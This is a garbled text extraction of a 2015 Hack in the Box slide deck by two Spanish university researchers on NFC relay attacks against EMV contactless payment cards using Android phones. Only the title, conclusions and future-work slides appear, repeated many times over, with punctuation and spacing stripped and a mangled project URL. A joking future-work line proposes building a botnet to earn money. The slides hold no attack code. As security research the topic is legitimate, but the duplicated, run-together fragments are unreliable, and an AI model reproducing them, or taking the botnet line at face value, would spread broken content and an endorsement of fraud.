ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
